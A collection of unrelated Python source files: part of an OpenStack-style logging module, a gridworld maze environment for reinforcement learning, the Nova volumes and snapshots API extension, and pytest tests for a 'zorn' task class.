extra.update({'instance': instance_extra})
extra.update({"project": self.project})
extra.update({"version": self.version})
extra['extra'] = extra.copy()
return msg, kwargs
class JSONFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
# NOTE(jkoelker) we ignore the fmt argument, but its still there
# since logging.config.fileConfig passes it.
self.datefmt = datefmt
def formatException(self, ei, strip_newlines=True):
lines = traceback.format_exception(*ei)
if strip_newlines:
lines = [itertools.ifilter(
lambda x: x,
line.rstrip().splitlines()) for line in lines]
lines = list(itertools.chain(*lines))
return lines
def format(self, record):
message = {'message': record.getMessage(),
'asctime': self.formatTime(record, self.datefmt),
'name': record.name,
'msg': record.msg,
'args': record.args,
'levelname': record.levelname,
'levelno': record.levelno,
'pathname': record.pathname,
'filename': record.filename,
'module': record.module,
'lineno': record.lineno,
'funcname': record.funcName,
'created': record.created,
'msecs': record.msecs,
'relative_created': record.relativeCreated,
'thread': record.thread,
'thread_name': record.threadName,
'process_name': record.processName,
'process': record.process,
'traceback': None}
if hasattr(record, 'extra'):
message['extra'] = record.extra
if record.exc_info:
message['traceback'] = self.formatException(record.exc_info)
return jsonutils.dumps(message)
def _create_logging_excepthook(product_name):
def logging_excepthook(type, value, tb):
extra = {}
if CONF.verbose:
extra['exc_info'] = (type, value, tb)
getLogger(product_name).critical(str(value), **extra)
return logging_excepthook
class LogConfigError(Exception):
message = _('Error loading logging config %(log_config)s: %(err_msg)s')
def __init__(self, log_config, err_msg):
self.log_config = log_config
self.err_msg = err_msg
def __str__(self):
return self.message % dict(log_config=self.log_config,
err_msg=self.err_msg)
def _load_log_config(log_config):
try:
logging.config.fileConfig(log_config)
except ConfigParser.Error as exc:
raise LogConfigError(log_config, str(exc))
def setup(product_name):
"""Setup logging."""
if CONF.log_config:
_load_log_config(CONF.log_config)
else:
_setup_logging_from_conf()
sys.excepthook = _create_logging_excepthook(product_name)
def set_defaults(logging_context_format_string):
cfg.set_defaults(log_opts,
logging_context_format_string=
logging_context_format_string)
def _find_facility_from_conf():
facility_names = logging.handlers.SysLogHandler.facility_names
facility = getattr(logging.handlers.SysLogHandler,
CONF.syslog_log_facility,
None)
if facility is None and CONF.syslog_log_facility in facility_names:
facility = facility_names.get(CONF.syslog_log_facility)
if facility is None:
valid_facilities = facility_names.keys()
consts = ['LOG_AUTH', 'LOG_AUTHPRIV', 'LOG_CRON', 'LOG_DAEMON',
'LOG_FTP', 'LOG_KERN', 'LOG_LPR', 'LOG_MAIL', 'LOG_NEWS',
'LOG_AUTH', 'LOG_SYSLOG', 'LOG_USER', 'LOG_UUCP',
'LOG_LOCAL0', 'LOG_LOCAL1', 'LOG_LOCAL2', 'LOG_LOCAL3',
'LOG_LOCAL4', 'LOG_LOCAL5', 'LOG_LOCAL6', 'LOG_LOCAL7']
valid_facilities.extend(consts)
raise TypeError(_('syslog facility must be one of: %s') %
', '.join("'%s'" % fac
for fac in valid_facilities))
return facility
def _setup_logging_from_conf():
log_root = getLogger(None).logger
for handler in log_root.handlers:
log_root.removeHandler(handler)
if CONF.use_syslog:
facility = _find_facility_from_conf()
syslog = logging.handlers.SysLogHandler(address='/dev/log',
facility=facility)
log_root.addHandler(syslog)
logpath = _get_log_file_path()
if logpath:
filelog = logging.handlers.WatchedFileHandler(logpath)
log_root.addHandler(filelog)
if CONF.use_stderr:
streamlog = ColorHandler()
log_root.addHandler(streamlog)
elif not CONF.log_file:
# pass sys.stdout as a positional argument
# python2.6 calls the argument strm, in 2.7 it's stream
streamlog = logging.StreamHandler(sys.stdout)
log_root.addHandler(streamlog)
if CONF.publish_errors:
handler = importutils.import_object(
"sarlacc.openstack.common.log_handler.PublishErrorsHandler",
logging.ERROR)
log_root.addHandler(handler)
datefmt = CONF.log_date_format
for handler in log_root.handlers:
# NOTE(alaski): CONF.log_format overrides everything currently. This
# should be deprecated in favor of context aware formatting.
if CONF.log_format:
handler.setFormatter(logging.Formatter(fmt=CONF.log_format,
datefmt=datefmt))
log_root.info('Deprecated: log_format is now deprecated and will '
'be removed in the next release')
else:
handler.setFormatter(ContextFormatter(datefmt=datefmt))
if CONF.debug:
log_root.setLevel(logging.DEBUG)
elif CONF.verbose:
log_root.setLevel(logging.INFO)
else:
log_root.setLevel(logging.WARNING)
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
level = logging.getLevelName(level_name)
logger = logging.getLogger(mod)
logger.setLevel(level)
_loggers = {}
def getLogger(name='unknown', version='unknown'):
if name not in _loggers:
_loggers[name] = ContextAdapter(logging.getLogger(name),
name,
version)
return _loggers[name]
def getLazyLogger(name='unknown', version='unknown'):
"""Returns lazy logger.
Creates a pass-through logger that does not create the real logger
until it is really needed and delegates all calls to the real logger
once it is created.
"""
return LazyAdapter(name, version)
class WritableLogger(object):
"""A thin wrapper that responds to `write` and logs."""
def __init__(self, logger, level=logging.INFO):
self.logger = logger
self.level = level
def write(self, msg):
self.logger.log(self.level, msg)
class ContextFormatter(logging.Formatter):
"""A context.RequestContext aware formatter configured through flags.
The flags used to set format strings are: logging_context_format_string
and logging_default_format_string. You can also specify
logging_debug_format_suffix to append extra formatting if the log level is
debug.
For information about what variables are available for the formatter see:
http://docs.python.org/library/logging.html#formatter
"""
def format(self, record):
"""Uses contextstring if request_id is set, otherwise default."""
# NOTE(sdague): default the fancier formating params
# to an empty string so we don't throw an exception if
# they get used
for key in ('instance', 'color'):
if key not in record.__dict__:
record.__dict__[key] = ''
if record.__dict__.get('request_id', None):
self._fmt = CONF.logging_context_format_string
else:
self._fmt = CONF.logging_default_format_string
if (record.levelno == logging.DEBUG and
CONF.logging_debug_format_suffix):
self._fmt += " " + CONF.logging_debug_format_suffix
# Cache this on the record, Logger will respect our formated copy
if record.exc_info:
record.exc_text = self.formatException(record.exc_info, record)
return logging.Formatter.format(self, record)
def formatException(self, exc_info, record=None):
"""Format exception output with CONF.logging_exception_prefix."""
if not record:
return logging.Formatter.formatException(self, exc_info)
stringbuffer = cStringIO.StringIO()
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
None, stringbuffer)
lines = stringbuffer.getvalue().split('\n')
stringbuffer.close()
if CONF.logging_exception_prefix.find('%(asctime)') != -1:
record.asctime = self.formatTime(record, self.datefmt)
formatted_lines = []
for line in lines:
pl = CONF.logging_exception_prefix % record.__dict__
fl = '%s%s' % (pl, line)
formatted_lines.append(fl)
return '\n'.join(formatted_lines)
class ColorHandler(logging.StreamHandler):
LEVEL_COLORS = {
logging.DEBUG: '\033[00;32m', # GREEN
logging.INFO: '\033[00;36m', # CYAN
logging.AUDIT: '\033[01;36m', # BOLD CYAN
logging.WARN: '\033[01;33m', # BOLD YELLOW
logging.ERROR: '\033[01;31m', # BOLD RED
logging.CRITICAL: '\033[01;31m', # BOLD RED
}
def format(self, record):
record.color = self.LEVEL_COLORS[record.levelno]
return logging.StreamHandler.format(self, record)
class DeprecatedConfig(Exception):
message = _("Fatal call to deprecated config: %(msg)s")
def __init__(self, msg):
super(Exception, self).__init__(self.message % dict(msg=msg))
|
|
import numpy as np
from ..utils import check_random_state
# Maze state is represented as a 2-element NumPy array: (Y, X). Increasing Y is South.
# Possible actions, expressed as (delta-y, delta-x).
maze_actions = {
'N': np.array([-1, 0]),
'S': np.array([1, 0]),
'E': np.array([0, 1]),
'W': np.array([0, -1]),
}
def parse_topology(topology):
return np.array([list(row) for row in topology])
class Maze(object):
"""
Simple wrapper around a NumPy 2D array to handle flattened indexing and staying in bounds.
"""
def __init__(self, topology):
self.topology = parse_topology(topology)
self.flat_topology = self.topology.ravel()
self.shape = self.topology.shape
def in_bounds_flat(self, position):
return 0 <= position < np.product(self.shape)
def in_bounds_unflat(self, position):
return 0 <= position[0] < self.shape[0] and 0 <= position[1] < self.shape[1]
def get_flat(self, position):
if not self.in_bounds_flat(position):
raise IndexError("Position out of bounds: {}".format(position))
return self.flat_topology[position]
def get_unflat(self, position):
if not self.in_bounds_unflat(position):
raise IndexError("Position out of bounds: {}".format(position))
return self.topology[tuple(position)]
def flatten_index(self, index_tuple):
return np.ravel_multi_index(index_tuple, self.shape)
def unflatten_index(self, flattened_index):
return np.unravel_index(flattened_index, self.shape)
def flat_positions_containing(self, x):
return list(np.nonzero(self.flat_topology == x)[0])
def flat_positions_not_containing(self, x):
return list(np.nonzero(self.flat_topology != x)[0])
def __str__(self):
return '\n'.join(''.join(row) for row in self.topology.tolist())
def __repr__(self):
return 'Maze({})'.format(repr(self.topology.tolist()))
def move_avoiding_walls(maze, position, action):
"""
Return the new position after moving, and the event that happened ('hit-wall' or 'moved').
Works with the position and action as a (row, column) array.
"""
# Compute new position
new_position = position + action
# Compute collisions with walls, including implicit walls at the ends of the world.
if not maze.in_bounds_unflat(new_position) or maze.get_unflat(new_position) == '#':
return position, 'hit-wall'
return new_position, 'moved'
class GridWorld(object):
"""
A simple task in a maze: get to the goal.
Parameters
----------
maze : list of strings or lists
maze topology (see below)
rewards: dict of string to number. default: {'*': 10}.
Rewards obtained by being in a maze grid with the specified contents,
or experiencing the specified event (either 'hit-wall' or 'moved'). The
contributions of content reward and event reward are summed. For
example, you might specify a cost for moving by passing
rewards={'*': 10, 'moved': -1}.
terminal_markers: sequence of chars, default '*'
A grid cell containing any of these markers will be considered a
"terminal" state.
action_error_prob: float
With this probability, the requested action is ignored and a random
action is chosen instead.
random_state: None, int, or RandomState object
For repeatable experiments, you can pass a random state here. See
http://scikit-learn.org/stable/modules/generated/sklearn.utils.check_random_state.html
Notes
-----
Maze topology is expressed textually. Key:
'#': wall
'.': open (really, anything that's not '#')
'*': goal
'o': origin
"""
def __init__(self, maze, rewards={'*': 10}, terminal_markers='*', action_error_prob=0, random_state=None, directions="NSEW"):
self.maze = Maze(maze) if not isinstance(maze, Maze) else maze
self.rewards = rewards
self.terminal_markers = terminal_markers
self.action_error_prob = action_error_prob
self.random_state = check_random_state(random_state)
self.actions = [maze_actions[direction] for direction in directions]
self.num_actions = len(self.actions)
self.state = None
self.reset()
self.num_states = self.maze.shape[0] * self.maze.shape[1]
def __repr__(self):
return 'GridWorld(maze={maze!r}, rewards={rewards}, terminal_markers={terminal_markers}, action_error_prob={action_error_prob})'.format(**self.__dict__)
def reset(self):
"""
Reset the position to a starting position (an 'o'), chosen at random.
"""
options = self.maze.flat_positions_containing('o')
self.state = options[self.random_state.choice(len(options))]
def is_terminal(self, state):
"""Check if the given state is a terminal state."""
return self.maze.get_flat(state) in self.terminal_markers
def observe(self):
"""
Return the current state as an integer.
The state is the index into the flattened maze.
"""
return self.state
def perform_action(self, action_idx):
"""Perform an action (specified by index), yielding a new state and reward."""
# In the absorbing end state, nothing does anything.
if self.is_terminal(self.state):
return self.observe(), 0
if self.action_error_prob and self.random_state.rand() < self.action_error_prob:
action_idx = self.random_state.choice(self.num_actions)
action = self.actions[action_idx]
new_state_tuple, result = move_avoiding_walls(self.maze, self.maze.unflatten_index(self.state), action)
self.state = self.maze.flatten_index(new_state_tuple)
reward = self.rewards.get(self.maze.get_flat(self.state), 0) + self.rewards.get(result, 0)
return self.observe(), reward
def as_mdp(self):
transition_probabilities = np.zeros((self.num_states, self.num_actions, self.num_states))
rewards = np.zeros((self.num_states, self.num_actions, self.num_states))
action_rewards = np.zeros((self.num_states, self.num_actions))
destination_rewards = np.zeros(self.num_states)
for state in range(self.num_states):
destination_rewards[state] = self.rewards.get(self.maze.get_flat(state), 0)
is_terminal_state = np.zeros(self.num_states, dtype=np.bool)
for state in range(self.num_states):
if self.is_terminal(state):
is_terminal_state[state] = True
transition_probabilities[state, :, state] = 1.
else:
for action in range(self.num_actions):
new_state_tuple, result = move_avoiding_walls(self.maze, self.maze.unflatten_index(state), self.actions[action])
new_state = self.maze.flatten_index(new_state_tuple)
transition_probabilities[state, action, new_state] = 1.
action_rewards[state, action] = self.rewards.get(result, 0)
# Now account for action noise.
transitions_given_random_action = transition_probabilities.mean(axis=1, keepdims=True)
transition_probabilities *= (1 - self.action_error_prob)
transition_probabilities += self.action_error_prob * transitions_given_random_action
rewards_given_random_action = action_rewards.mean(axis=1, keepdims=True)
action_rewards = (1 - self.action_error_prob) * action_rewards + self.action_error_prob * rewards_given_random_action
rewards = action_rewards[:, :, None] + destination_rewards[None, None, :]
rewards[is_terminal_state] = 0
return transition_probabilities, rewards
def get_max_reward(self):
transition_probabilities, rewards = self.as_mdp()
return rewards.max()
### Old API, where terminal states were None.
def observe_old(self):
return None if self.is_terminal(self.state) else self.state
def perform_action_old(self, action_idx):
new_state, reward = self.perform_action(action_idx)
if self.is_terminal(new_state):
return None, reward
else:
return new_state, reward
samples = {
'trivial': [
'###',
'#o#',
'#.#',
'#*#',
'###'],
'larger': [
'#########',
'#..#....#',
'#..#..#.#',
'#..#..#.#',
'#..#.##.#',
'#....*#.#',
'#######.#',
'#o......#',
'#########']
}
def construct_cliff_task(width, height, goal_reward=50, move_reward=-1, cliff_reward=-100, **kw):
"""
Construct a 'cliff' task, a GridWorld with a "cliff" between the start and
goal. Falling off the cliff gives a large negative reward and ends the
episode.
Any other parameters, like action_error_prob, are passed on to the
GridWorld constructor.
"""
maze = ['.' * width] * (height - 1) # middle empty region
maze.append('o' + 'X' * (width - 2) + '*') # bottom goal row
rewards = {
'*': goal_reward,
'moved': move_reward,
'hit-wall': move_reward,
'X': cliff_reward
}
return GridWorld(maze, rewards=rewards, terminal_markers='*X', **kw)
|
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes extension."""
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import utils
from nova import volume
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'volumes')
authorize_attach = extensions.extension_authorizer('compute',
'volume_attachments')
def _translate_volume_detail_view(context, vol):
"""Maps keys for volumes details view."""
d = _translate_volume_summary_view(context, vol)
# No additional data / lookups at the moment
return d
def _translate_volume_summary_view(context, vol):
"""Maps keys for volumes summary view."""
d = {}
d['id'] = vol['id']
d['status'] = vol['status']
d['size'] = vol['size']
d['availabilityZone'] = vol['availability_zone']
d['createdAt'] = vol['created_at']
if vol['attach_status'] == 'attached':
d['attachments'] = [_translate_attachment_detail_view(vol['id'],
vol['instance_uuid'],
vol['mountpoint'])]
else:
d['attachments'] = [{}]
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
if vol['volume_type_id'] and vol.get('volume_type'):
d['volumeType'] = vol['volume_type']['name']
else:
d['volumeType'] = vol['volume_type_id']
d['snapshotId'] = vol['snapshot_id']
LOG.audit(_("vol=%s"), vol, context=context)
if vol.get('volume_metadata'):
metadata = vol.get('volume_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
else:
d['metadata'] = {}
return d
def make_volume(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('availabilityZone')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeType')
elem.set('snapshotId')
attachments = xmlutil.SubTemplateElement(elem, 'attachments')
attachment = xmlutil.SubTemplateElement(attachments, 'attachment',
selector='attachments')
make_attachment(attachment)
# Attach metadata node
elem.append(common.MetadataTemplate())
class VolumeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volume', selector='volume')
make_volume(root)
return xmlutil.MasterTemplate(root, 1)
class VolumesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumes')
elem = xmlutil.SubTemplateElement(root, 'volume', selector='volumes')
make_volume(elem)
return xmlutil.MasterTemplate(root, 1)
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_volume(self, node):
"""Marshal the volume attribute of a parsed request."""
vol = {}
volume_node = self.find_first_child_named(node, 'volume')
attributes = ['display_name', 'display_description', 'size',
'volume_type', 'availability_zone']
for attr in attributes:
if volume_node.getAttribute(attr):
vol[attr] = volume_node.getAttribute(attr)
metadata_node = self.find_first_child_named(volume_node, 'metadata')
if metadata_node is not None:
vol['metadata'] = self.extract_metadata(metadata_node)
return vol
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted create volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
def default(self, string):
"""Deserialize an xml-formatted volume create request."""
dom = xmlutil.safe_minidom_parse_string(string)
vol = self._extract_volume(dom)
return {'body': {'volume': vol}}
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(VolumeController, self).__init__()
@wsgi.serializers(xml=VolumeTemplate)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'volume': _translate_volume_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete volume with id: %s"), id, context=context)
try:
vol = self.volume_api.get(context, id)
self.volume_api.delete(context, vol)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=VolumesTemplate)
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@wsgi.serializers(xml=VolumesTemplate)
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
volumes = self.volume_api.get_all(context)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
@wsgi.serializers(xml=VolumeTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new volume."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'volume'):
raise exc.HTTPUnprocessableEntity()
vol = body['volume']
vol_type = vol.get('volume_type', None)
metadata = vol.get('metadata', None)
snapshot_id = vol.get('snapshot_id')
if snapshot_id is not None:
snapshot = self.volume_api.get_snapshot(context, snapshot_id)
else:
snapshot = None
size = vol.get('size', None)
if size is None and snapshot is not None:
size = snapshot['volume_size']
LOG.audit(_("Create volume of %s GB"), size, context=context)
availability_zone = vol.get('availability_zone', None)
new_volume = self.volume_api.create(context,
size,
vol.get('display_name'),
vol.get('display_description'),
snapshot=snapshot,
volume_type=vol_type,
metadata=metadata,
availability_zone=availability_zone
)
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume))
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _translate_attachment_detail_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment details view."""
d = _translate_attachment_summary_view(volume_id,
instance_uuid,
mountpoint)
# No additional data / lookups at the moment
return d
def _translate_attachment_summary_view(volume_id, instance_uuid, mountpoint):
"""Maps keys for attachment summary view."""
d = {}
# NOTE(justinsb): We use the volume id as the id of the attachment object
d['id'] = volume_id
d['volumeId'] = volume_id
d['serverId'] = instance_uuid
if mountpoint:
d['device'] = mountpoint
return d
def make_attachment(elem):
elem.set('id')
elem.set('serverId')
elem.set('volumeId')
elem.set('device')
class VolumeAttachmentTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachment',
selector='volumeAttachment')
make_attachment(root)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('volumeAttachments')
elem = xmlutil.SubTemplateElement(root, 'volumeAttachment',
selector='volumeAttachments')
make_attachment(elem)
return xmlutil.MasterTemplate(root, 1)
class VolumeAttachmentController(wsgi.Controller):
"""The volume attachment API controller for the OpenStack API.
A child resource of the server. Note that we use the volume id
as the ID of the attachment (though this is not guaranteed externally)
"""
def __init__(self):
self.compute_api = compute.API()
self.volume_api = volume.API()
super(VolumeAttachmentController, self).__init__()
@wsgi.serializers(xml=VolumeAttachmentsTemplate)
def index(self, req, server_id):
"""Returns the list of volume attachments for a given instance."""
context = req.environ['nova.context']
authorize_attach(context, action='index')
return self._items(req, server_id,
entity_maker=_translate_attachment_summary_view)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def show(self, req, server_id, id):
"""Return data about the given volume attachment."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='show')
volume_id = id
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
raise exc.HTTPNotFound()
bdms = self.compute_api.get_instance_bdms(context, instance)
if not bdms:
LOG.debug(_("Instance %s is not attached."), server_id)
raise exc.HTTPNotFound()
assigned_mountpoint = None
for bdm in bdms:
if bdm['volume_id'] == volume_id:
assigned_mountpoint = bdm['device_name']
break
if assigned_mountpoint is None:
LOG.debug("volume_id not found")
raise exc.HTTPNotFound()
return {'volumeAttachment': _translate_attachment_detail_view(
volume_id,
instance['uuid'],
assigned_mountpoint)}
def _validate_volume_id(self, volume_id):
if not uuidutils.is_uuid_like(volume_id):
msg = _("Bad volumeId format: volumeId is "
"not in proper format (%s)") % volume_id
raise exc.HTTPBadRequest(explanation=msg)
@wsgi.serializers(xml=VolumeAttachmentTemplate)
def create(self, req, server_id, body):
"""Attach a volume to an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='create')
if not self.is_valid_body(body, 'volumeAttachment'):
raise exc.HTTPUnprocessableEntity()
volume_id = body['volumeAttachment']['volumeId']
device = body['volumeAttachment'].get('device')
self._validate_volume_id(volume_id)
msg = _("Attach volume %(volume_id)s to instance %(server_id)s"
" at %(device)s") % locals()
LOG.audit(msg, context=context)
try:
instance = self.compute_api.get(context, server_id)
device = self.compute_api.attach_volume(context, instance,
volume_id, device)
except exception.NotFound:
raise exc.HTTPNotFound()
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'attach_volume')
# The attach is async
attachment = {}
attachment['id'] = volume_id
attachment['serverId'] = server_id
attachment['volumeId'] = volume_id
attachment['device'] = device
# NOTE(justinsb): And now, we have a problem...
# The attach is async, so there's a window in which we don't see
# the attachment (until the attachment completes). We could also
# get problems with concurrent requests. I think we need an
# attachment state, and to write to the DB here, but that's a bigger
# change.
# For now, we'll probably have to rely on libraries being smart
# TODO(justinsb): How do I return "accepted" here?
return {'volumeAttachment': attachment}
def update(self, req, server_id, id, body):
"""Update a volume attachment. We don't currently support this."""
raise exc.HTTPBadRequest()
def delete(self, req, server_id, id):
"""Detach a volume from an instance."""
context = req.environ['nova.context']
authorize(context)
authorize_attach(context, action='delete')
volume_id = id
LOG.audit(_("Detach volume %s"), volume_id, context=context)
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
raise exc.HTTPNotFound()
volume = self.volume_api.get(context, volume_id)
bdms = self.compute_api.get_instance_bdms(context, instance)
if not bdms:
LOG.debug(_("Instance %s is not attached."), server_id)
raise exc.HTTPNotFound()
found = False
try:
for bdm in bdms:
if bdm['volume_id'] != volume_id:
continue
try:
self.compute_api.detach_volume(context, instance, volume)
found = True
break
except exception.VolumeUnattached:
# The volume is not attached. Treat it as NotFound
# by falling through.
pass
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'detach_volume')
if not found:
raise exc.HTTPNotFound()
else:
return webob.Response(status_int=202)
def _items(self, req, server_id, entity_maker):
"""Returns a list of attachments, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
try:
instance = self.compute_api.get(context, server_id)
except exception.NotFound:
raise exc.HTTPNotFound()
bdms = self.compute_api.get_instance_bdms(context, instance)
limited_list = common.limited(bdms, req)
results = []
for bdm in limited_list:
if bdm['volume_id']:
results.append(entity_maker(bdm['volume_id'],
bdm['instance_uuid'],
bdm['device_name']))
return {'volumeAttachments': results}
def _translate_snapshot_detail_view(context, vol):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, vol)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, vol):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = vol['id']
d['volumeId'] = vol['volume_id']
d['status'] = vol['status']
# NOTE(gagupta): We map volume_size as the snapshot size
d['size'] = vol['volume_size']
d['createdAt'] = vol['created_at']
d['displayName'] = vol['display_name']
d['displayDescription'] = vol['display_description']
return d
def make_snapshot(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('createdAt')
elem.set('displayName')
elem.set('displayDescription')
elem.set('volumeId')
class SnapshotTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshot', selector='snapshot')
make_snapshot(root)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshots')
elem = xmlutil.SubTemplateElement(root, 'snapshot',
selector='snapshots')
make_snapshot(elem)
return xmlutil.MasterTemplate(root, 1)
class SnapshotController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self):
self.volume_api = volume.API()
super(SnapshotController, self).__init__()
@wsgi.serializers(xml=SnapshotTemplate)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['nova.context']
authorize(context)
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.NotFound:
return exc.HTTPNotFound()
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['nova.context']
authorize(context)
LOG.audit(_("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.delete_snapshot(context, snapshot)
except exception.NotFound:
return exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=SnapshotsTemplate)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@wsgi.serializers(xml=SnapshotsTemplate)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['nova.context']
authorize(context)
snapshots = self.volume_api.get_all_snapshots(context)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@wsgi.serializers(xml=SnapshotTemplate)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['nova.context']
authorize(context)
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
volume_id = snapshot['volume_id']
vol = self.volume_api.get(context, volume_id)
force = snapshot.get('force', False)
LOG.audit(_("Create snapshot from volume %s"), volume_id,
context=context)
if not utils.is_valid_boolstr(force):
msg = _("Invalid value '%s' for force. ") % force
raise exception.InvalidParameterValue(err=msg)
if utils.bool_from_str(force):
new_snapshot = self.volume_api.create_snapshot_force(context,
vol,
snapshot.get('display_name'),
snapshot.get('display_description'))
else:
new_snapshot = self.volume_api.create_snapshot(context,
vol,
snapshot.get('display_name'),
snapshot.get('display_description'))
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
class Volumes(extensions.ExtensionDescriptor):
"""Volumes support."""
name = "Volumes"
alias = "os-volumes"
namespace = "http://docs.openstack.org/compute/ext/volumes/api/v1.1"
updated = "2011-03-25T00:00:00+00:00"
def get_resources(self):
resources = []
# NOTE(justinsb): No way to provide singular name ('volume')
# Does this matter?
res = extensions.ResourceExtension('os-volumes',
VolumeController(),
collection_actions={'detail': 'GET'})
resources.append(res)
res = extensions.ResourceExtension('os-volume_attachments',
VolumeAttachmentController(),
parent=dict(
member_name='server',
collection_name='servers'))
resources.append(res)
res = extensions.ResourceExtension('os-volumes_boot',
inherits='servers')
resources.append(res)
res = extensions.ResourceExtension('os-snapshots',
SnapshotController(),
collection_actions={'detail': 'GET'})
resources.append(res)
return resources
|
|
import os
import shutil
import sys
from io import StringIO
import pytest
from zorn import errors, tasks
def test_task():
task = tasks.Task()
assert task.verbosity == 1
def test_task_run():
task = tasks.Task()
with StringIO() as stream:
sys.stdout = stream
task.run()
assert 'Welcome to zorn!' in stream.getvalue()
def test_comunicate_standard_verbosity():
task = tasks.Task(verbosity=1)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == 'standard\n'
def test_comunicate_silent():
task = tasks.Task(verbosity=0)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == ''
def test_comunicate_verbose():
task = tasks.Task(verbosity=2)
with StringIO() as stream:
sys.stdout = stream
task.communicate('standard')
task.communicate('verbose', False)
assert stream.getvalue() == 'standard\nverbose\n'
def test_admin_task():
os.environ['ZORN_SETTINGS_PATH'] = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'test_project', 'settings.py'
)
task = tasks.AdminTask(verbosity=1, update=True)
assert task.verbosity == 1
assert task.update is True
assert task.settings == {'root_dir': 'test', 'other_setting': 'test test'}
